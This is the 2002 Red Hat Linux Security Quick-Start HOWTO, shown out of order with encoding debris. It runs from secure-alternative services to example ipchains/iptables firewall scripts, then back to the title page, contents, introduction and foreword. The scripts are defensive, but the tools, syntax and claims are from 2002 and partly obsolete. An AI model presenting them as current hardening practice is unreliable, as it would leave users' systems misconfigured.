<A0><A0>*<2A>ftp, rcp - scp or sftp. Both are part of ssh packages. Also, files can
    easily be transfered via HTTP if Apache is already running anyway. Apache
    can be buttoned down even more by using SSL (HTTPS).

<A0><A0>*<2A>sendmail - postfix, qmail. Not to imply that current versions of sendmail
    are insecure. Just that there is some bad history there, and just because
    it is so widely used that it makes an inviting crack target.

    As noted above, Linux installations often include a fully functional mail
    server. While this may have some advantages, it is not necessary in many
    cases for simply sending mail, or retrieving mail. This can all be done
    without a "mail server daemon" running locally.

<A0><A0>*<2A>POP3 - SPOP3, POP3 over SSL. If you really need to run your own POP
    server, this is the way to do it. If retrieving your mail from your ISP's
    server, then you are at their mercy as to what they provide.

<A0><A0>*<2A>IMAP - IMAPS, same as above.

<A0><A0>*<2A>If you find you need a particular service, and it is for just you or a
    few friends, consider running it on a non-standard port. Most server
    daemons support this, and is not a problem as long as those who will be
    connecting, know about it. For instance, the standard port for sshd is
    22. Any worm or scan will probe for this port number. So run it on a
    randomly chosen port. See the sshd man page.


-----------------------------------------------------------------------------
8.10. Ipchains and Iptables Redux

This section offers a little more advanced look at some of things that
ipchains and iptables can do. These are basically the same scripts as in Step
3 above, just with some more advanced configuration options added. These will
provide "masquerading", "port forwarding", allow access to some user
definable services, and a few other things. Read the comments for
explanations.
-----------------------------------------------------------------------------

8.10.1. ipchains II

#!/bin/sh
#
# ipchains.sh
#
# An example of a simple ipchains configuration. This script
# can enable 'masquerading' and will open user definable ports.
#
###################################################################
# Begin variable declarations and user configuration options ######
#
# Set the location of ipchains (default).
IPCHAINS=/sbin/ipchains

# Local Interfaces
#
# This is the WAN interface, that is our link to the outside world.
# For pppd and pppoe users.
# WAN_IFACE="ppp0"
WAN_IFACE="eth0"
#
# Local Area Network (LAN) interface.
#LAN_IFACE="eth0"
LAN_IFACE="eth1"

# Our private LAN address(es), for masquerading.
LAN_NET="192.168.1.0/24"

# For static IP, set it here!
#WAN_IP="1.2.3.4"

# Set a list of public server port numbers here...not too many!
# These will be open to the world, so use caution. The example is
# sshd, and HTTP (www). Any services included here should be the
# latest version available from your vendor. Comment out to disable
# all PUBLIC services.
#PUBLIC_PORTS="22 80 443"
PUBLIC_PORTS="22"

# If we want to do port forwarding, this is the host
# that will be forwarded to.
#FORWARD_HOST="192.168.1.3"

# A list of ports that are to be forwarded.
#FORWARD_PORTS="25  80"

# If you get your public IP address via DHCP, set this.
DHCP_SERVER=66.21.184.66

# If you need identd for a mail server, set this.
MAIL_SERVER=

# A list of unwelcome hosts or nets. These will be denied access
# to everything, even our 'PUBLIC' services. Provide your own list.
#BLACKLIST="11.22.33.44 55.66.77.88"

# A list of "trusted" hosts and/or nets. These will have access to
# ALL protocols, and ALL open ports. Be selective here.
#TRUSTED="1.2.3.4/8  5.6.7.8"

## end user configuration options #################################
###################################################################

# The high ports used mostly for connections we initiate and return
# traffic.
LOCAL_PORTS=`cat /proc/sys/net/ipv4/ip_local_port_range |cut -f1`:\
`cat /proc/sys/net/ipv4/ip_local_port_range |cut -f2`

# Any and all addresses from anywhere.
ANYWHERE="0/0"

# Start building chains and rules #################################
#
# Let's start clean and flush all chains to an empty state.
$IPCHAINS -F

# Set the default policies of the built-in chains. If no match for any
# of the rules below, these will be the defaults that ipchains uses.
$IPCHAINS -P forward DENY
$IPCHAINS -P output ACCEPT
$IPCHAINS -P input DENY

# Accept localhost/loopback traffic.
$IPCHAINS -A input -i lo -j ACCEPT

# Get our dynamic IP now from the Inet interface. WAN_IP will be our
# IP address we are protecting from the outside world. Put this
# here, so default policy gets set, even if interface is not up
# yet.
[ -z "$WAN_IP" ] &&\
  WAN_IP=`ifconfig $WAN_IFACE |grep inet |cut -d : -f 2 |cut -d \  -f 1`

# Bail out with error message if no IP available! Default policy is
# already set, so all is not lost here.
[ -z "$WAN_IP" ] && echo "$WAN_IFACE not configured, aborting." && exit 1

WAN_MASK=`ifconfig $WAN_IFACE | grep Mask | cut -d : -f 4`
WAN_NET="$WAN_IP/$WAN_MASK"

## Reserved IPs:
#
# We should never see these private addresses coming in from outside
# to our external interface.
$IPCHAINS -A input -l -i $WAN_IFACE -s 10.0.0.0/8     -j DENY
$IPCHAINS -A input -l -i $WAN_IFACE -s 172.16.0.0/12  -j DENY
$IPCHAINS -A input -l -i $WAN_IFACE -s 192.168.0.0/16 -j DENY
$IPCHAINS -A input -l -i $WAN_IFACE -s 127.0.0.0/8    -j DENY
$IPCHAINS -A input -l -i $WAN_IFACE -s 169.254.0.0/16 -j DENY
$IPCHAINS -A input -l -i $WAN_IFACE -s 224.0.0.0/4    -j DENY
$IPCHAINS -A input -l -i $WAN_IFACE -s 240.0.0.0/5    -j DENY
# Bogus routing
$IPCHAINS -A input -l -s 255.255.255.255 -d $ANYWHERE -j DENY

## LAN access and masquerading
#
# Allow connections from our own LAN's private IP addresses via the LAN
# interface and set up forwarding for masqueraders if we have a LAN_NET
# defined above.
if [ -n "$LAN_NET" ]; then
 echo 1 > /proc/sys/net/ipv4/ip_forward
 $IPCHAINS -A input  -i $LAN_IFACE  -j ACCEPT
 $IPCHAINS -A forward -s $LAN_NET -d $LAN_NET -j ACCEPT
 $IPCHAINS -A forward  -s $LAN_NET -d ! $LAN_NET -j MASQ
fi

## Blacklist hosts/nets
#
# Get the blacklisted hosts/nets out of the way, before we start opening
# up any services. These will have no access to us at all, and will be
# logged.
for i in $BLACKLIST; do
 $IPCHAINS -A input -l -s $i -j DENY
done

## Trusted hosts/nets
#
# This is our trusted host list. These have access to everything.
for i in $TRUSTED; do
 $IPCHAINS -A input -s $i -j ACCEPT
done

# Port Forwarding
#
# Which ports get forwarded to which host. This is one to one
# port mapping (ie 80 -> 80) in this case.
# NOTE: ipmasqadm is a separate package from ipchains and needs
# to be installed also. Check first!
[ -n "$FORWARD_HOST" ] && ipmasqadm portfw -f &&\
 for i in $FORWARD_PORTS; do
   ipmasqadm portfw -a -P tcp -L $WAN_IP $i -R $FORWARD_HOST $i
 done

## Open, but Restricted Access ports/services
#
# Allow DHCP server (their port 67) to client (to our port 68) UDP traffic
# from outside source.
[ -n "$DHCP_SERVER" ] &&\
 $IPCHAINS -A input -p udp -s $DHCP_SERVER 67 -d $ANYWHERE 68 -j ACCEPT

# Allow 'identd' (to our TCP port 113) from mail server only.
[ -n "$MAIL_SERVER" ] &&\
 $IPCHAINS -A input -p tcp -s $MAIL_SERVER  -d $WAN_IP 113 -j ACCEPT

# Open up PUBLIC server ports here (available to the world):
for i in $PUBLIC_PORTS; do
 $IPCHAINS -A input -p tcp -s $ANYWHERE -d $WAN_IP $i -j ACCEPT
done

# So I can check my home POP3 mailbox from work. Also, so I can ssh
# in to home system. Only allow connections from my workplace's
# various IPs. Everything else is blocked.
$IPCHAINS -A input -p tcp -s 255.10.9.8/29 -d $WAN_IP 110 -j ACCEPT

# Uncomment to allow ftp data back (active ftp). Not required for 'passive'
# ftp connections.
#$IPCHAINS -A input -p tcp -s $ANYWHERE 20 -d $WAN_IP $LOCAL_PORTS -y -j ACCEPT

# Accept non-SYN TCP, and UDP connections to LOCAL_PORTS. These are
# the high, unprivileged ports (1024 to 4999 by default). This will
# allow return connection traffic for connections that we initiate
# to outside sources. TCP connections are opened with 'SYN' packets.
# We have already opened those services that need to accept SYNs
# for, so other SYNs are excluded here for everything else.
$IPCHAINS -A input -p tcp -s $ANYWHERE -d $WAN_IP $LOCAL_PORTS ! -y -j ACCEPT

# We can't be so selective with UDP since that protocol does not know
# about SYNs.
$IPCHAINS -A input -p udp -s $ANYWHERE -d $WAN_IP $LOCAL_PORTS -j ACCEPT

# Allow access to the masquerading ports conditionally. Masquerading
# uses it's own port range -- on 2.2 kernels ONLY! 2.4 kernels, do not
# use these ports, so comment out!
[ -n "$LAN_NET" ] &&\
 $IPCHAINS -A input -p tcp -s $ANYWHERE -d $WAN_IP 61000: ! -y -j ACCEPT &&\
 $IPCHAINS -A input -p udp -s $ANYWHERE -d $WAN_IP 61000: -j ACCEPT

## ICMP (ping)
#
# ICMP rules, allow the bare essential types of ICMP only. Ping
# request is blocked, ie we won't respond to someone else's pings,
# but can still ping out.
$IPCHAINS -A input  -p icmp  --icmp-type echo-reply \
   -s $ANYWHERE -i $WAN_IFACE -j ACCEPT
$IPCHAINS -A input  -p icmp  --icmp-type destination-unreachable \
   -s $ANYWHERE -i $WAN_IFACE -j ACCEPT
$IPCHAINS -A input  -p icmp  --icmp-type time-exceeded \
   -s $ANYWHERE -i $WAN_IFACE -j ACCEPT

#######################################################################
# Set the catchall, default rule to DENY, and log it all. All other
# traffic not allowed by the rules above, winds up here, where it is
# blocked and logged. This is the default policy for this chain
# anyway, so we are just adding the logging ability here with '-l'.
# Outgoing traffic is allowed as the default policy for the 'output'
# chain. There are no restrictions on that.

$IPCHAINS -A input -l -j DENY

echo "Ipchains firewall is up `date`."

##-- eof ipchains.sh


-----------------------------------------------------------------------------

8.10.2. iptables II

#!/bin/sh
#
# iptables.sh
#
# An example of a simple iptables configuration. This script
# can enable 'masquerading' and will open user definable ports.
#
###################################################################
# Begin variable declarations and user configuration options ######
#
# Set the location of iptables (default).
IPTABLES=/sbin/iptables

# Local Interfaces
# This is the WAN interface that is our link to the outside world.
# For pppd and pppoe users.
# WAN_IFACE="ppp0"
WAN_IFACE="eth0"
#
# Local Area Network (LAN) interface.
#LAN_IFACE="eth0"
LAN_IFACE="eth1"

# Our private LAN address(es), for masquerading.
LAN_NET="192.168.1.0/24"

# For static IP, set it here!
#WAN_IP="1.2.3.4"

# Set a list of public server port numbers here...not too many!
# These will be open to the world, so use caution. The example is
# sshd, and HTTP (www). Any services included here should be the
# latest version available from your vendor. Comment out to disable
# all Public services. Do not put any ports to be forwarded here,
# this only direct access.
#PUBLIC_PORTS="22 80 443"
PUBLIC_PORTS="22"

# If we want to do port forwarding, this is the host
# that will be forwarded to.
#FORWARD_HOST="192.168.1.3"

# A list of ports that are to be forwarded.
#FORWARD_PORTS="25  80"

# If you get your public IP address via DHCP, set this.
DHCP_SERVER=66.21.184.66

# If you need identd for a mail server, set this.
MAIL_SERVER=

# A list of unwelcome hosts or nets. These will be denied access
# to everything, even our 'Public' services. Provide your own list.
#BLACKLIST="11.22.33.44 55.66.77.88"

# A list of "trusted" hosts and/or nets. These will have access to
# ALL protocols, and ALL open ports. Be selective here.
#TRUSTED="1.2.3.4/8  5.6.7.8"

## end user configuration options #################################
###################################################################

# Any and all addresses from anywhere.
ANYWHERE="0/0"

# These modules may need to be loaded:
modprobe ip_conntrack_ftp
modprobe ip_nat_ftp

# Start building chains and rules #################################
#
# Let's start clean and flush all chains to an empty state.
$IPTABLES -F
$IPTABLES -X


# Set the default policies of the built-in chains. If no match for any
# of the rules below, these will be the defaults that IPTABLES uses.
$IPTABLES -P FORWARD DROP
$IPTABLES -P OUTPUT ACCEPT
$IPTABLES -P INPUT DROP

# Accept localhost/loopback traffic.
$IPTABLES -A INPUT -i lo -j ACCEPT

# Get our dynamic IP now from the Inet interface. WAN_IP will be the
# address we are protecting from outside addresses.
[ -z "$WAN_IP" ] &&\
  WAN_IP=`ifconfig $WAN_IFACE |grep inet |cut -d : -f 2 |cut -d \  -f 1`

# Bail out with error message if no IP available! Default policy is
# already set, so all is not lost here.
[ -z "$WAN_IP" ] && echo "$WAN_IFACE not configured, aborting." && exit 1

WAN_MASK=`ifconfig $WAN_IFACE |grep Mask |cut -d : -f 4`
WAN_NET="$WAN_IP/$WAN_MASK"

## Reserved IPs:
#
# We should never see these private addresses coming in from outside
# to our external interface.
$IPTABLES -A INPUT -i $WAN_IFACE -s 10.0.0.0/8      -j DROP
$IPTABLES -A INPUT -i $WAN_IFACE -s 172.16.0.0/12   -j DROP
$IPTABLES -A INPUT -i $WAN_IFACE -s 192.168.0.0/16  -j DROP
$IPTABLES -A INPUT -i $WAN_IFACE -s 127.0.0.0/8     -j DROP
$IPTABLES -A INPUT -i $WAN_IFACE -s 169.254.0.0/16  -j DROP
$IPTABLES -A INPUT -i $WAN_IFACE -s 224.0.0.0/4     -j DROP
$IPTABLES -A INPUT -i $WAN_IFACE -s 240.0.0.0/5     -j DROP
# Bogus routing
$IPTABLES -A INPUT -s 255.255.255.255 -d $ANYWHERE -j DROP

# Unclean
$IPTABLES -A INPUT -i $WAN_IFACE -m unclean -m limit \
        --limit 15/minute -j LOG --log-prefix "Unclean: "
$IPTABLES -A INPUT -i $WAN_IFACE -m unclean -j DROP

## LAN access and masquerading
#
# Allow connections from our own LAN's private IP addresses via the LAN
# interface and set up forwarding for masqueraders if we have a LAN_NET
# defined above.
if [ -n "$LAN_NET" ]; then
 echo 1 > /proc/sys/net/ipv4/ip_forward
 $IPTABLES -A INPUT -i $LAN_IFACE  -j ACCEPT
# $IPTABLES -A INPUT -i $LAN_IFACE -s $LAN_NET -d $LAN_NET  -j ACCEPT
 $IPTABLES -t nat -A POSTROUTING -s $LAN_NET -o $WAN_IFACE -j MASQUERADE
fi

## Blacklist
#
# Get the blacklisted hosts/nets out of the way, before we start opening
# up any services. These will have no access to us at all, and will
# be logged.
for i in $BLACKLIST; do
 $IPTABLES -A INPUT -s $i -m limit --limit 5/minute \
   -j LOG --log-prefix "Blacklisted: "
 $IPTABLES -A INPUT -s $i -j DROP
done

## Trusted hosts/nets
#
# This is our trusted host list. These have access to everything.
for i in $TRUSTED; do
 $IPTABLES -A INPUT -s $i -j ACCEPT
done

# Port Forwarding
#
# Which ports get forwarded to which host. This is one to one
# port mapping (ie 80 -> 80) in this case.
[ -n "$FORWARD_HOST" ] &&\
 for i in $FORWARD_PORTS; do
   $IPTABLES -A FORWARD -p tcp -s $ANYWHERE -d $FORWARD_HOST \
     --dport $i -j ACCEPT
   $IPTABLES -t nat -A PREROUTING -p tcp -d $WAN_IP --dport $i \
     -j DNAT --to $FORWARD_HOST:$i
 done

## Open, but Restricted Access ports
#
# Allow DHCP server (their port 67) to client (to our port 68) UDP
# traffic from outside source.
[ -n "$DHCP_SERVER" ] &&\
 $IPTABLES -A INPUT -p udp -s $DHCP_SERVER --sport 67 \
   -d $ANYWHERE --dport 68 -j ACCEPT

# Allow 'identd' (to our TCP port 113) from mail server only.
[ -n "$MAIL_SERVER" ] &&\
 $IPTABLES -A INPUT -p tcp -s $MAIL_SERVER  -d $WAN_IP --dport 113 -j ACCEPT

# Open up Public server ports here (available to the world):
for i in $PUBLIC_PORTS; do
 $IPTABLES -A INPUT -p tcp -s $ANYWHERE -d $WAN_IP --dport $i -j ACCEPT
done

# So I can check my home POP3 mailbox from work. Also, so I can ssh
# in to home system. Only allow connections from my workplace's
# various IPs. Everything else is blocked.
$IPTABLES -A INPUT -p tcp -s 255.10.9.8/29 -d $WAN_IP --dport 110 -j ACCEPT

## ICMP (ping)
#
# ICMP rules, allow the bare essential types of ICMP only. Ping
# request is blocked, ie we won't respond to someone else's pings,
# but can still ping out.
$IPTABLES -A INPUT  -p icmp  --icmp-type echo-reply \
   -s $ANYWHERE -d $WAN_IP -j ACCEPT
$IPTABLES -A INPUT  -p icmp  --icmp-type destination-unreachable \
   -s $ANYWHERE -d $WAN_IP -j ACCEPT
$IPTABLES -A INPUT  -p icmp  --icmp-type time-exceeded \
   -s $ANYWHERE -d $WAN_IP -j ACCEPT

# Identd Reject
#
# Special rule to reject (with rst) any identd/auth/port 113
# connections. This will speed up some services that ask for this,
# but don't require it. Be careful, some servers may require this
# one (IRC for instance).
#$IPTABLES -A INPUT -p tcp --dport 113 -j REJECT --reject-with tcp-reset

###################################################################
# Build a custom chain here, and set the default to DROP. All
# other traffic not allowed by the rules above, ultimately will
# wind up here, where it is blocked and logged, unless it passes
# our stateful rules for ESTABLISHED and RELATED connections. Let
# connection tracking do most of the worrying! We add the logging
# ability here with the '-j LOG' target. Outgoing traffic is
# allowed as that is the default policy for the 'output' chain.
# There are no restrictions placed on that in this script.

# New chain...
$IPTABLES -N DEFAULT
# Use the 'state' module to allow only certain connections based
# on their 'state'.
$IPTABLES -A DEFAULT -m state --state ESTABLISHED,RELATED -j ACCEPT
$IPTABLES -A DEFAULT -m state --state NEW -i ! $WAN_IFACE -j ACCEPT
# Enable logging for anything that gets this far.
$IPTABLES -A DEFAULT -j LOG -m limit --limit 30/minute --log-prefix "Dropping: "
# Now drop it, if it has gotten here.
$IPTABLES -A DEFAULT -j DROP

# This is the 'bottom line' so to speak. Everything winds up
# here, where we bounce it to our custom built 'DEFAULT' chain
# that we defined just above. This is for both the FORWARD and
# INPUT chains.

$IPTABLES -A FORWARD -j DEFAULT
$IPTABLES -A INPUT   -j DEFAULT

echo "Iptables firewall is up `date`."

##-- eof iptables.sh


-----------------------------------------------------------------------------

8.10.3. Summary

A quick run down of the some highlights...

We added some host based access control rules: "blacklisted", and "trusted".
We then showed several types of service and port based access rules. For
instance, we allowed some very restrictive access to bigcat's POP3 server so
we could connect only from our workplace. We allowed a very narrow rule for
the ISP's DHCP server. This rule only allows one port on one outside IP
address to connect to only one of our ports and only via the UDP protocol.
This is a very specific rule! We are being specific since there is no reason
to allow any other traffic to these ports or from these addresses. Remember
our goal is the minimum amount of traffic necessary for our particular
situation.

So we made those few exceptions mentioned above, and all other services
running on bigcat should be effectively blocked completely from outside
connections. These are still happily running on bigcat, but are now safe and
sound behind our packet filtering firewall. You probably have other services
that fall in this category as well.

We also have a small, home network in the above example. We did not take any
steps to block that traffic. So the LAN has access to all services running on
bigcat. And it is further "masqueraded", so that it has Internet access
(different HOWTO), by manipulating the "forward" chain. And the LAN is still
protected by our firewall since it sits behind the firewall. We also didn't
impose any restrictive rules on the traffic leaving bigcat. In some
situations, this might be a good idea.

Of course, this is just a hypothetical example. Your individual situation is
surely different, and would require some changes and likely some additions to
the rules above. For instance, if your ISP does not use DHCP (most do not),
then that rule would make no sense. PPP works differently and such rules are
not needed.

Please don't interpret that running any server as we did in this example is
necessarily a "safe" thing to do. We shouldn't do it this way unless a) we
really need to and b) we are running the current, safe version, and c) we are
able to keep abreast of security related issues that might effect these
services. Vigilance and caution are part of our responsibilities here too.
-----------------------------------------------------------------------------

8.10.4. iptables mini-me

Just to demonstrate how succinctly iptables can be configured in a minimalist
situation, the below is from the Netfilter team's Rusty's Really Quick Guide
To Packet Filtering:


    "Most people just have a single PPP connection to the Internet, and don't
    want anyone coming back into their network, or the firewall:"

 ## Insert connection-tracking modules (not needed if built into kernel).
 insmod ip_conntrack
 insmod ip_conntrack_ftp

 ## Create chain which blocks new connections, except if coming from inside.
 iptables -N block
 iptables -A block -m state --state ESTABLISHED,RELATED -j ACCEPT
 iptables -A block -m state --state NEW -i ! ppp0 -j ACCEPT
 iptables -A block -j DROP

 ## Jump to that chain from INPUT and FORWARD chains.
 iptables -A INPUT -j block
 iptables -A FORWARD -j block


This simple script will allow all outbound connections that we initiate, i.e.
any NEW connections (since the default policy of ACCEPT is not changed). Then
any connections that are "ESTABLISHED" and "RELATED" to these are also
allowed. And, any connections that are not incoming from our WAN side
interface, ppp0, are also allowed. This would be lo or possibly a LAN
interface like eth1. So we can do whatever we want, but no unwanted, incoming
connection attempts are allowed from the Internet. None.

This script also demonstrates the creation of a custom chain, defined here as
"block", which is used both for the INPUT and FORWARD chains.

Security Quick-Start HOWTO for Red Hat Linux

Hal Burgiss

<A0><A0><A0><A0><A0>hal@foobox.net
<A0><A0><A0><A0>

v. 1.2, 2002-07-21
Revision History
Revision v. 1.2             2002-07-21           Revised by: hb
A few small additions, and fix the usual broken links.
Revision v. 1.1             2002-02-06           Revised by: hb
A few fixes, some additions and many touch-ups from the original.
Revision v. 1.0             2001-11-07           Revised by: hb
Initial Release.


This document is a an overview of the basic steps required to secure a Linux
installation from intrusion. It is intended to be an introduction. This is a
Red Hat specific version of this document.

-----------------------------------------------------------------------------
Table of Contents
1. Introduction
    1.1. Why me?
    1.2. Notes
    1.3. Copyright
    1.4. Credits
    1.5. Disclaimer
    1.6. New Versions and Changelog
    1.7. Feedback


2. Foreword
    2.1. The Optimum Configuration
    2.2. Before We Start


3. Step 1: Which services do we really need?
    3.1. System Audit
    3.2. The Danger Zone (or r00t m3 pl34s3)
    3.3. Stopping Services
    3.4. Exceptions
    3.5. Summary and Conclusions for Step 1


4. Step 2: Updating
    4.1. Summary and Conclusions for Step 2


5. Step 3: Firewalls and Setting Access Policies
    5.1. Strategy
    5.2. Packet Filters -- Ipchains and Iptables
    5.3. Tcpwrappers (libwrap)
    5.4. PortSentry
    5.5. Proxies
    5.6. Individual Applications
    5.7. Verifying
    5.8. Logging
    5.9. Where to Start
    5.10. Summary and Conclusions for Step 3


6. Intrusion Detection
    6.1. Intrusion Detection Systems (IDS)
    6.2. Have I Been Hacked?
    6.3. Reclaiming a Compromised System


7. General Tips
8. Appendix
    8.1. Servers, Ports, and Packets
    8.2. Common Ports
    8.3. Netstat Tutorial
    8.4. Attacks and Threats
    8.5. Links
    8.6. Editing Text Files
    8.7. nmap
    8.8. Sysctl Options
    8.9. Secure Alternatives
    8.10. Ipchains and Iptables Redux


1. Introduction

1.1. Why me?

Who should be reading this document and why should the average Linux user
care about security? Those new to Linux, or unfamiliar with the inherent
security issues of connecting a Linux system to large networks like Internet
should be reading. "Security" is a broad subject with many facets, and is
covered in much more depth in other documents, books, and on various sites on
the Web. This document is intended to be an introduction to the most basic
concepts as they relate to Red Hat Linux, and as a starting point only.


Iptables<A0>Weekly<A0>Log<A0>Summary<A0>from<A0>Jul<A0>15<A0>04:24:13<31>to<74>Jul<75>22<32>04:06:00
Blocked<A0>Connection<A0>Attempts:

Rejected<A0>tcp<A0>packets<A0>by<A0>destination<A0>port

port<A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0>count
111<A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0>19
53<A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0>12
21<A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0>9
515<A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0>9
27374<A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0>8
443<A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0>6
1080<A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0>2
1138<A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0>1


Rejected<A0>udp<A0>packets<A0>by<A0>destination<A0>port

port<A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0>count
137<A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0>34
22<A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0><A0>1

<A0><A0><A0><A0>

The above is real, live data from a one week period for my home LAN. Much of
the above would seem to be specifically targeted at Linux systems. Many of
the targeted "destination" ports are used by well known Linux and Unix
services, and all may be installed, and possibly even running, on your
system.

The focus here will be on threats that are shared by all Linux users, whether
a dual boot home user, or large commercial site. And we will take a few,
relatively quick and easy steps that will make a typical home Desktop system
or small office system running Red Hat Linux reasonably safe from the
majority of outside threats. For those responsible for Linux systems in a
larger or more complex environment, you'd be well advised to read this, and
then follow up with additional reading suitable to your particular situation.
Actually, this is probably good advice for everybody.

We will assume the reader knows little about Linux, networking, TCP/IP, and
the finer points of running a server Operating System like Linux. We will
also assume, for the sake of this document, that all local users are
"trusted" users, and won't address physical or local network security issues
in any detail. Again, if this is not the case, further reading is strongly
recommended.

The principles that will guide us in our quest are:

<A0><A0>*<2A>There is no magic bullet. There is no one single thing we can do to make
    us secure. It is not that simple.

<A0><A0>*<2A>Security is a process that requires maintenance, not an objective to be
    reached.

<A0><A0>*<2A>There is no 100% safe program, package or distribution. Just varying
    degrees of insecurity.


The steps we will be taking to get there are:

<A0><A0>*<2A>Step 1: Turn off, and perhaps uninstall, any and all unnecessary
    services.

<A0><A0>*<2A>Step 2: Make sure that any services that are installed are updated and
    patched to the current, safe version -- and then stay that way. Every
    server application has potential exploits. Some have just not been found
    yet.

<A0><A0>*<2A>Step 3: Limit connections to us from outside sources by implementing a
    firewall and/or other restrictive policies. The goal is to allow only the
    minimum traffic necessary for whatever our individual situation may be.

<A0><A0>*<2A>Awareness. Know your system, and how to properly maintain and secure it.
    New vulnerabilities are found, and exploited, all the time. Today's
    secure system may have tomorrow's as yet unfound weaknesses.


If you don't have time to read everything, concentrate on Steps 1, 2, and 3.
This is where the meat of the subject matter is. The Appendix has a lot of
supporting information, which may be helpful, but may not be necessary for
all readers.
-----------------------------------------------------------------------------

1.2. Notes

This is a Red Hat specific version of this document. The included examples
are compatible with Red Hat 7.0 and later. Actually, most examples should
work with earlier versions of Red Hat as well. Also, this document should be
applicable to other distributions that are Red Hat derivatives, such as
Mandrake, Conectiva, etc.

Overwhelmingly, the content of this document is not peculiar to Red Hat. The
same rules and methodologies apply to other Linuxes. And indeed, to other
Operating Systems as well. But each may have their own way of doing things --
the file names and locations may differ, as may the system utilities that we
rely on. It is these differences that make this document a "Red Hat" version.
-----------------------------------------------------------------------------

1.3. Copyright

Security-Quickstart HOWTO for Red Hat Linux

Copyright <20> 2001 Hal Burgiss.

This document is free; you can redistribute it and/or modify it under the
terms of the GNU General Public License as published by the Free Software
Foundation; either version 2 of the License, or (at your option) any later
version.

This document is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
details.

You can get a copy of the GNU GPL at at [http://www.gnu.org/copyleft/
gpl.html] http://www.gnu.org/copyleft/gpl.html.
-----------------------------------------------------------------------------

1.4. Credits

Many thanks to those who helped with the production of this document.

<A0><A0>*<2A>Bill Staehle, who has done a little bit of everything: ideas, editing,
    encouragement, and suggestions, many of which have been incorporated.
    Bill helped greatly with the content of this document.

<A0><A0>*<2A>Others who have contributed in one way or another: Dave Wreski, Ian
    Jones, Jacco de Leeuw, and Indulis Bernsteins.

<A0><A0>*<2A>Various posters on comp.os.linux.security, a great place to learn about
    Linux and security.

<A0><A0>*<2A>The Netfilter Development team for their work on iptables and connection
    tracking, state of the art tools with which to protect our systems.


-----------------------------------------------------------------------------
1.5. Disclaimer

The author accepts no liability for the contents of this document. Use the
concepts, examples and other content at your own risk. As this is a new
document, there may be errors and inaccuracies. Hopefully these are few and
far between. Corrections and suggestions are welcomed.

This document is intended to give the new user a starting point for securing
their system while it is connected to the Internet. Please understand that
there is no intention whatsoever of claiming that the contents of this
document will necessarily result in an ultimately secure and worry-free
computing environment. Security is a complex topic. This document just
addresses some of the most basic issues that inexperienced users should be
aware of.

The reader is encouraged to read other security related documentation and
articles. And to stay abreast of security issues as they evolve. Security is
not an objective, but an ongoing process.
-----------------------------------------------------------------------------

1.6. New Versions and Changelog

The current official version can always be found at [http://www.tldp.org/
HOWTO/Security-Quickstart-Redhat-HOWTO/] http://www.tldp.org/HOWTO/
Security-Quickstart-Redhat-HOWTO/. Pre-release versions can be found at
[http://feenix.burgiss.net/ldp/quickstart-rh/] http://feenix.burgiss.net/ldp/
quickstart-rh/.

Other formats, including PDF, PS, single page HTML, may be found at the Linux
Documentation HOWTO index page: [http://tldp.org/docs.html#howto] http://
tldp.org/docs.html#howto.

Changelog:

Version 1.2: Clarifications on example firewall scripts, and small additions
to 'Have I been Hacked'. Note on Zonealarm type applications. More on the use
of "chattr" by script kiddies, and how to check for this. Other small
additions and clarifications.

Version 1.1: Various corrections, amplifications and numerous mostly small
additions. Too many to list. Oh yea, learn to spell Red Hat correctly ;-)

Version 1.0: This is the initial release of this document. Comments welcomed.
-----------------------------------------------------------------------------

1.7. Feedback

Any and all comments on this document are most welcomed. Please make sure you
have the most current version before submitting corrections or suggestions!
These can be sent to <hal@foobox.net>.
-----------------------------------------------------------------------------

2. Foreword

Before getting into specifics, let's try to briefly answer some questions
about why we need to be concerned about security in the first place.

It is easy to see why an e-commerce site, an on-line bank, or a government
agency with sensitive documents would be concerned about security. But what
about the average user? Why should even a Linux home Desktop user worry about
security?

Anyone connected to the Internet is a target, plain and simple. It makes
little difference whether you have a part-time dialup connection, or a
full-time connection, though full-time connections make for bigger targets.
Larger sites make for bigger targets too, but this does not let small users
off the hook since the "small user" may be less skilled and thus an easier
victim. Red Hat, and Red Hat based distributions, tend to make for bigger
targets as well, since the installed user base is so large.

There are those out there that are scanning just for easy victims all the
time. If you start logging unwanted connection attempts, you will see this
soon enough. There is little doubt that many of these attempts are
maliciously motivated and the attacker, in some cases, is looking for Linux
boxes to crack. Does someone on the other side of the globe really want to
borrow my printer?

What do they want? Often, they just may want your computer, your IP address,
and your bandwidth. Then they use you to either attack others, or possibly
commit crimes or mischief and are hiding their true identity behind you. This
is an all too common scenario. Commercial and high-profile sites are targeted
more directly and have bigger worries, but we all face this type of common
threat.

With a few reasonable precautions, Red Hat Linux can be very secure, and with
all the available tools, makes for a fantastically fun and powerful Internet
connection or server. Most successful break-ins are the result of ignorance
or carelessness.

The bottom line is:

<A0><A0>*<2A>Do you want control of your own system or not?

<A0><A0>*<2A>Do you want to unwittingly participate in criminal activity?

<A0><A0>*<2A>Do you want to be used by someone else?

<A0><A0>*<2A>Do you want to risk losing your Internet connection?

<A0><A0>*<2A>Do you want to have to go through the time consuming steps of reclaiming
    your system?

<A0><A0>*<2A>Do you want to chance the loss of data on your system?


These are all real possibilities, unless we take the appropriate precautions.

Warning If you are reading this because you have already been broken into, or
        suspect that you have, you cannot trust any of your system utilities
